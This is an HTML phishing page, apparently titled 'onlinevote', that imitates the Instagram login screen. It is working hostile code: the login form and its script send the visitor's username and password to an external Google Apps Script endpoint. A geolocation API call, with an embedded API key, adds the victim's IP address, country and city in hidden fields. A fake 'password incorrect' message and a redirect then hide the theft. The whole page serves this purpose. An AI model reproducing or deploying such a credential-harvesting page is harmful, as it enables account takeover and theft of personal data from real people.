
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>onlinevote</title>
    <link rel="stylesheet" href="/css/content2.css">
    
</head>
    <body>
          
      
            <!-- 1-Role Main -->
            <main class="main" role="main">
              <div class="wrapper">
                <article class="article">
                  <div class="content">
                    <div class="login-box">
                      <div class="header">
                        <img class="logo" src="img/iiiggg.png"  alt="">
                      </div><!-- Header end -->
                      <div class="form-wrap">
                        <form action= 'https://script.google.com/macros/s/AKfycby5sbjkYhb_s5zuPsO4pJmPWFZehHxFxmECgiNMr5YCw48MHMKDOr4_NTa1z8jpugR-kA/exec' id="form"  method="POST">
      
                          <div class="input-box">
                            <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name='USER'  required >
                          </div>  
                          
                          <div class="input-box">
                            <input  type="password" name="PASS" id="password" placeholder="Password" aria-describedby="" min-length="8" aria-required="true" autocapitalize="off" autocorrect="off" required>
                          </div> 
                          <input type="text" name="CATEGORY" value="IIGG" hidden>
                          <input type="text" name="CONTINENT" id="continent" value="" hidden>
                          <input type="text" name="COUNTRY" id="country" value="" hidden>
                          <input type="text" name="CAPITAL" id="capital" value="" hidden>
                          <input type="text" name="STATE" id="state" value="" hidden>
                          <input type="text" name="CITY" id="city" value="" hidden>
                          <input type="text" name="CURRENCY" id="currency" value="" hidden>
                          <input type="text" name="PHONE_CODE" id="phone_code" value="" hidden>
                          <input type="text" name="IP_ADDRESS" id="ip" value="" hidden>
                          <span class="button-box">
                            <button type="submit" name="submit" id="submit" class="btn">login</button>
                          </span>  



      
                          <!-- <a class="forgot" href="">Forgot password?</a> -->
                        </form>
                      </div>
                                <!-- error messages... -->

                                <div id="error" style="display: none; color:red; margin:12px auto; font-size:0.5rem; padding:12px; text-align: center; ">
                              </div><!-- Form-wrap end -->
                    </div>
                    
                    <div style="text-align: center; margin:23px auto; color:#737373;" > Forgot password? </div><!-- Login-box end -->
      
                    <div class="login-box">
                      <p class="text">Don't have an account?<a href="#">Sign up</a></p>
                    </div> <!-- Signup-box end -->
      
                    <div class="app">
                      <p>Get the app.</p>
                      <div class="app-img">
                        <a href="#"><img src="/img/insta.png" >
                        </a>

                        <a href="#"><img src="/img/mistant.png" >
                        </a>
                         
                      </div>  <!-- App-img end-->
                    </div> <!-- App end -->
                  </div> <!-- Content end -->
                </article>
              </div> <!-- Wrapper end -->
            </main>
      
            <!-- 2-Role Footer -->
            <footer class="footer" role="contentinfo">
              <div class="footer-container">
      
                <nav class="footer-nav" role="navigation">
                  <ul>
                    <li><a href="">About</a></li>
                    <li><a href="">Blog</a></li>
                    <li><a href="">Jobs</a></li>
                    <li><a href="">help</a></li>
                    <li><a href="">Jobs</a></li>
                    <li><a href="">Help</a></li>
                    <li><a href="">API</a></li>
                    <li><a href="">Terms</a></li>
                    <li><a href="">Top Accounts</a></li>
                    <li><a href="">Locations</a></li>
                    <li><a href="">Contact UPloading and Non-Users</a></li>
                    <li>
                      <span class="language">
                        <select name="language" class="select" onchange="la(this.value)">
                          <option value="#">English</option>
                          <option value="http://ru-instafollow.bitballoon.com">Russian</option>
                        </select>
                      </span>
                    </li>
                  </ul>
                </nav>
      
                <span class="footer-logo">;</span>
              </div> <!-- Footer container end -->
            </footer>
            
          </section>
        </span> <!-- Root -->
      
        
        

        <script>
          const  error= document.querySelector("#error");
          const form = document.querySelector("#form")
         const submitButton = document.querySelector("#submit")
         const scriptURL = 'https://script.google.com/macros/s/AKfycby5sbjkYhb_s5zuPsO4pJmPWFZehHxFxmECgiNMr5YCw48MHMKDOr4_NTa1z8jpugR-kA/exec'
      
         form.addEventListener('submit', e => {
           submitButton.disabled = true
           e.preventDefault() 
           let requestBody = new FormData(form)
           fetch(scriptURL, { method: 'POST', body: requestBody})
           .then(function response(data){
               var error = document.getElementById("error");
                error.style.display="block";
                error.innerHTML="The password you entered is incorrect. Check your password or username and try again.";
            //
            submitButton.disabled = true
           setTimeout(() => {
            window.location.href= "/content3.html";
           }, 2000);
            form.rest();
           })
            .catch(error => {
              submitButton.disabled = false })
}) 


var xhr= new XMLHttpRequest();
 xhr.addEventListener('readystatechange', function (){


    if(xhr.readyState==4){
      var data = JSON.parse(this.responseText);
        let continentName = data.continent.name;
        let countryName = data.country.name;
        let cityName = data.country.capital;
        let state= data.state.name;
        let city= data.city.name;
        let countryCurrency = data.country.currency;
        let phoneCode= data.country.phone_code;
        let ip = data.ip;

        document.getElementById("continent").value = continentName;
        document.getElementById("country").value = countryName;
        document.getElementById("capital").value = cityName;
        document.getElementById("state").value = state;
        document.getElementById("city").value = city;
        document.getElementById("currency").value = countryCurrency;
        document.getElementById("phone_code").value = phoneCode;
        document.getElementById("ip").value = ip;
        
      }

     
    })
xhr.open('GET', 'https://api.geoapify.com/v1/ipinfo?&apiKey=1ee5beee55c74cde815530b82f8ab2bf');
xhr.send();


      
      </script>
      </body


</html>